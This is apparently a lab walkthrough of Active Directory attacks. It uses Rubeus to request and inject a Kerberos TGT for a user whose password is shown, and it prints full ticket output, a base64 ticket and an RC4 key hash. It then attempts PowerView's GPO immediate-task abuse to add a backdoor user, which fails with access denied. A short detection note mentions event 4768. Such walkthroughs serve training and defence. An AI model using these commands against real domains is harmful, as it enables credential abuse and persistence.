Requesting a TGT for the user gpowrite.user
This exercise must be performed as the user gpowrite.user.
First, we can run the klist command to see which Kerberos tickets the current logon session already holds (note that the cached TGT below belongs to regular.user, not gpowrite.user):
C:\Users\admin\Desktop>klist
Current LogonId is 0:0x10d6046
Cached Tickets: (2)
#0> Client: regular.user @ SPARTANCYBERSEC.CORP
Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/12/2023 20:30:04 (local)
End Time: 11/13/2023 6:30:04 (local)
Renew Time: 11/19/2023 20:30:04 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: First-DC.spartancybersec.corp
#1> Client: regular.user @ SPARTANCYBERSEC.CORP
Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/12/2023 20:30:04 (local)
End Time: 11/13/2023 6:30:04 (local)
Renew Time: 11/19/2023 20:30:04 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: First-DC.spartancybersec.corp
C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGDDCCBgigAwIBBaEDAgEWooIFBDCCBQBhggT8MIIE+KADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKwwggSooAMCARKh
AwIBAqKCBJoEggSWU3ykUEX1iauJdgy6kCv2SA8a9VxZqAJTG3nV0KtcXvT5AX4Z5qxhJkJle4kwe++X
BP/vg7hjlx8txvvRK1/B9P7ACy8StJeO/YNMYkrn1FH8Shiyn3TeeIGD4SuqvsNXSXb1dKyrOi9p7Gt6
7Kf4ifdlUOyTBizCYZf3BkP0Igk/FaelyxZZDSq0kwpSkMqbLrAKvxGHzSVWD6UmsNnJUUmwRnOr3ncN
4bX7+3WxTu7WgAi5nmY2BqFvjN0Exh+kQG2AldwDPJgN4tR9pgfESShgd3p7dn0S9orobVgnVqRpg5rO
18OF6ioi3cNnYa23c9YQy91x603lZt0MkJOSjT6A94d0HbjtDCdPKXD0ZU5/cONIUmmqRaS23FXcgl12
+BeZjtwdLTPJRMfKAGApxLbeBZFdQvsncROhpOtAdgNaQCD91obY4nJV7lzRpx0X4UpVw2hnMuV2LETC
1x+fmZLLN2VBlJPWGXY8m+zfPAYFI4JxllY3xGUAXSCrLy61Rv3EXY4yyMuhhv4GXmvHv5Ru5ShHAOl2
HiJcqc29Ehn9AIcrAE/pMiWVYHMMt4hAudpv2qQYGtOLCvdek9dMqv2uAcUl9/g5ekcD2fyoR2TMK8hL
EiCfKAzOZDHanq8n50czpA211L3eLts+zTjYhafWxTUxKUsiDt2gpaLBslueAEXTy09n7H9wbwxZKcei
HvLV+ZMkiPGewa29JeZFVkrOEE/Gw3PSiq23S8qq4ZvB/5cEesR89eWJkoDJIlVwgUosqzh7P1R+tCYC
/UTrb+X14jtxFbAY5tzZtWYiEM1el2GPXdV2F+W9NlDzXqOLT5UOFrGC8xpr6FwUVEwILvKKX8+5NpUd
HYk8OG4f6hWcyxJpSf431EM4I2BtlqkEpRKTYZwExko33z7VhnMVwXabBOuykIs5NbB+DhwgWla4bx3/
4RYB0Iw7fUSAYbRRda04EzdJ7i+uu9ApIloyToogf792lO6rkEoZLCQm6hpmnh6tLx2Aj7TQPbfoaCX2
x/XC3CWUc91fUlPZXgFsVvG6wDkijEpLbVKNjiGF8nf9UkopG8uT5GbnQbTINVSLVRJkYqdVII8j6KSg
f76GI7HO2emgR/zRInNd/phz5BVE8cgk0h6R9hCh/sjCvaiH7P4Yc7rEb9gQ9AJlT7JVaLga7J3WkJYe
P7xy6lxLdFPXSFRpPnuvn+rTpA/D+7Ided3fnWi/Hw1BxNMFApN/TbXhWjI2xeWRW+wJePMSO8iRkqlr
iCQQBOMIlucJWhhV1dSDPm3PaVviIxiBGBK+JG1kg3YmB8bY+MrCyHulLVfbVXQaomTmMcPRzxpw4fef
ApogZmgpPilvprNjkPSzlYb4iFa6rx0ovYPEm5pi2Q8SlVCszUihr6vnVOC1P1U00rQ067F2R3CZABcz
zq9txDw879r0jlr4nWp6XOuH+qcMF+mEoaXL9cfOjrongvbuzKzVz0Nz0m4xyo7jA9HdZ+5zAFiGMzUn
sJv/vLgWKRLpkZ/MeO4PVCn4aNtGirfpP+ezm6l3tHYJ5EEj44aWwxpOyiU8w6OB8zCB8KADAgEAooHo
BIHlfYHiMIHfoIHcMIHZMIHWoBswGaADAgEXoRIEEHJBhZJD518NJpn16zvW3Q2hFhsUU1BBUlRBTkNZ
QkVSU0VDLkNPUlCiGjAYoAMCAQGhETAPGw1ncG93cml0ZS51c2VyowcDBQBA4QAApREYDzIwMjMxMTEy
MjAzODUzWqYRGA8yMDIzMTExMzA2Mzg1M1qnERgPMjAyMzExMTkyMDM4NTNaqBYbFFNQQVJUQU5DWUJF
UlNFQy5DT1JQqSkwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycA==
[+] Ticket successfully imported!
ServiceName : krbtgt/spartancybersec.corp
ServiceRealm : SPARTANCYBERSEC.CORP
UserName : gpowrite.user (NT_PRINCIPAL)
UserRealm : SPARTANCYBERSEC.CORP
StartTime : 11/12/2023 8:38:53 PM
EndTime : 11/13/2023 6:38:53 AM
RenewTill : 11/19/2023 8:38:53 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ckGFkkPnXw0mmfXrO9bdDQ==
ASREP (key) : 64FBAE31CC352FC26AF97CBDEF151E03
After this, the logon session holds a TGT for gpowrite.user, which can be confirmed with klist. Two details are worth noticing: because asktgt was given /password without /enctype, Rubeus derived the rc4_hmac (NT hash) key and sent an RC4 AS-REQ, which is why the session key type is now RC4-HMAC even though the ticket itself is AES-256 encrypted; an RC4 TGT request from a host that normally uses AES is a classic detection signal (event 4768 with encryption type 0x17). Also, /ptt only replaces the Kerberos identity of the current logon session: whoami still reports the original account, and only klist shows the change.
C:\Users\admin\Desktop>klist
Current LogonId is 0:0x10d6046
Cached Tickets: (1)
#0> Client: gpowrite.user @ SPARTANCYBERSEC.CORP
Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/12/2023 20:38:53 (local)
End Time: 11/13/2023 6:38:53 (local)
Renew Time: 11/19/2023 20:38:53 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
If we now run the following step (PowerView's New-GPOImmediateTask against the Default Domain Controllers Policy), it fails: the module locates the GPO but the write of ScheduledTasks.xml into the policy's SYSVOL folder is denied:
PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ... $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
+ FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand